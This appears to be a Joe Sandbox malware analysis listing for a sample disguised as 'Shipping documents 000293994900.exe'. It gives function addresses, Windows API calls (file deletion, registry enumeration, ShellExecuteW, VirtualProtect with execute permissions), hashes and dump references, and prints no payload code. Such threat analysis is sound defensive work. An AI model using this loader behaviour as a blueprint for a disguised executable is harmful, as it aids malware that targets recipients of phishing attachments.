Call, xrefs: 00401B49, 00401B4F, 00401B69

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: 82b143ca76a0ad2aa6951e2f71a1959c71fa5a87b6969dabeb77a470a6be7f14
Instruction ID: 832337492cf7a06c21e2abca279de06bf1a27b56728bc0a7368b5bd0ba670fc7
Opcode Fuzzy Hash: 82b143ca76a0ad2aa6951e2f71a1959c71fa5a87b6969dabeb77a470a6be7f14
Instruction Fuzzy Hash: 2321D2B2604101ABCB10DBA4DE8495FB3A8EB49314B24093BF581F33D1D778A8419FAD

Function 0040219E Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040622B: FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00406236
Part of subcall function 0040622B: FindClose.KERNEL32(00000000), ref: 00406242

lstrlenW.KERNEL32 ref: 004021DE
lstrlenW.KERNEL32(00000000), ref: 004021E9
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402212

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 5cc1749332b3b57a91ff7d25110549ce89a1fa95ab6080c74ad5ba30b4e2b3c6
Instruction ID: 6bed8099c30f558e68629b23c483ae923e88bf7bf978b8bddb761e1df3150e64
Opcode Fuzzy Hash: 5cc1749332b3b57a91ff7d25110549ce89a1fa95ab6080c74ad5ba30b4e2b3c6
Instruction Fuzzy Hash: 8C115271D10214A6CB10EFF9C949A9FB7B8EF14314F20843BB511FB2D5D6B899418B59

Function 00402452 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,0000028F,00000000,00000022,00000000,?,?), ref: 00402C6A

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402481
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402494
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvB4E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 4da3ee374b122c8e44559765249fc7571a9c31b0770631e970d664ec90db9a39
Instruction ID: 196cef28da363d1279e483bf9a38a563a29f189f24dbcf66659da751fa440e39
Opcode Fuzzy Hash: 4da3ee374b122c8e44559765249fc7571a9c31b0770631e970d664ec90db9a39
Instruction Fuzzy Hash: 87F0D1B1A04205ABE7108F65DE88ABF766CEF40358F60443EF405B21C0D6B85D419B6A

Function 00401DF3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\Uploadable\normallnnens,?), ref: 00401E3D

Strings

C:\Users\user\Uploadable\normallnnens, xrefs: 00401E26

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: ExecuteShell
String ID: C:\Users\user\Uploadable\normallnnens
API String ID: 587946157-2478767733
Opcode ID: b4fa3ccfc6d2602821902305855c69e2ef6e96ab6c2ad06ce8c4c20b50c86f6d
Instruction ID: 3f653c9cfcf7a787dcf128efd04e0ef48ce3664fdda10e2cbb7d118b60988be6
Opcode Fuzzy Hash: b4fa3ccfc6d2602821902305855c69e2ef6e96ab6c2ad06ce8c4c20b50c86f6d
Instruction Fuzzy Hash: 5EF0F675B54200ABDB006FB5DD4AE9E33B8AB24715F600937F401F70D1D6FC88419629

Function 10002870 Relevance: 3.2, APIs: 2, Instructions: 156COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00000000), ref: 1000292F
GetLastError.KERNEL32 ref: 10002A36

Memory Dump Source

Source File: 00000000.00000002.3053243332.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3053194517.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3053257984.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3053272824.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Shipping documents 000293994900.jbxd

Similarity

API ID: EnumErrorLastWindows
String ID:
API String ID: 14984897-0
Opcode ID: 25ba90756ec787877d4bf69bcc9f708461c4247993a7c98eb6ee1d719eb9b926
Instruction ID: 1e4ae0ab9f7d80da0c6c18ef4be67b5a8e29914e0a0cef2da75b429278759b76
Opcode Fuzzy Hash: 25ba90756ec787877d4bf69bcc9f708461c4247993a7c98eb6ee1d719eb9b926
Instruction Fuzzy Hash: C651A4BA805214DFFB10EF64DCC2B5937A4EB443D4F22842AEA04D722DCF34A994CB95

Function 004023DE Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,0000028F,00000000,00000022,00000000,?,?), ref: 00402C6A

RegQueryValueExW.KERNELBASE(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvB4E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 3741444217745918fa209080425cf8965bc832662536b474c8528d3afa2b0d60
Instruction ID: 6c75ae994a47700371a60e183d9c6493363f31bd6906e7075ff81e32be465fed
Opcode Fuzzy Hash: 3741444217745918fa209080425cf8965bc832662536b474c8528d3afa2b0d60
Instruction Fuzzy Hash: 6E11A071914205EEDB14CFA1DA585AFB7B4EF04358F60843FE042B72D0D6B85A41DB2A

Function 00405A3B Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Shipping documents 000293994900.exe"), ref: 004059EC
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09

lstrlenW.KERNEL32(00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Shipping documents 000293994900.exe"), ref: 00405A94
GetFileAttributesW.KERNELBASE(00424ED8,00424ED8,00424ED8,00424ED8,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00405AA4

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID:
API String ID: 3248276644-0
Opcode ID: 24ca669ab47e35d23b43d4bfaad095a7b1b39ed0889c711e0d8ed794351f313e
Instruction ID: fe6b2c3b67c783468e3d99353c909943c883638b9352ade8fce09ac857d2aff0
Opcode Fuzzy Hash: 24ca669ab47e35d23b43d4bfaad095a7b1b39ed0889c711e0d8ed794351f313e
Instruction Fuzzy Hash: EEF0F925305E5359D62133365C85EAF1554CF96364719073BB861B11D1CB3C8943CDBD

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D

Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
EnableWindow.USER32(00000000,00000000), ref: 00401DE8

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: b643271b868b9a40f851d1ef19f11c0424dbe1118e1d4d70f38c684e3c8424a9
Instruction ID: 0a70c1ef7b0b049098d210b4544fd1cb3982b30fa54b0c42b808752cdcd1ba25
Opcode Fuzzy Hash: b643271b868b9a40f851d1ef19f11c0424dbe1118e1d4d70f38c684e3c8424a9
Instruction Fuzzy Hash: 15E08CB2B04100DBD710AFA5AA8899D3378AB90369B60087BF502F10D1C6B86C008A7E

Function 00405B54 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\Shipping documents 000293994900.exe,80000000,00000003), ref: 00405B58
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16

Function 00405B2F Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405734,?,?,00000000,0040590A,?,?,?,?), ref: 00405B34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B48

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
Instruction ID: d8ea778f90f6dc502634cdc114c7d77142f0ebe51d0822ef38570996ea54cda0
Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
Instruction Fuzzy Hash: 0AD01272D09020AFC6102728EE0C89BFF69EB54371B018B31FD75A22F0C7305C52CAA6

Function 00402251 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
Instruction ID: fec69ff260b0ac9ecd577f12e686b41ce403e552977328a8d437569390afa8be
Opcode Fuzzy Hash: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
Instruction Fuzzy Hash: 22E086329041246ADB103EF20E8DD7F32785B45714B54023FB511BA2C2D5FC1D42476E

Function 00401718 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172C

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 92fe3424e3db77cce8708dc325f0d132fa3c79659b3364ce78a5e3850e78d784
Instruction ID: d23dd041866cef5afdca28ea12ef8b7a62ea4ba21799db9ef353d819d1220e11
Opcode Fuzzy Hash: 92fe3424e3db77cce8708dc325f0d132fa3c79659b3364ce78a5e3850e78d784
Instruction Fuzzy Hash: 55E048B1314100AAD710DF65DD48EAA7768DB01368F304576F211B61D1D2B469419729

Function 00402C42 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,0000028F,00000000,00000022,00000000,?,?), ref: 00402C6A

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
Instruction ID: e3df8b11752b843856ad965a2913e8001498b25c252565f1a48e325e263545e5
Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
Instruction Fuzzy Hash: 88E04F76280108BADB00DFA4ED46E9577ECEB14701F004425B608D6091C674E5008768

Function 00405BD7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9

Function 10002796 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027B4

Memory Dump Source

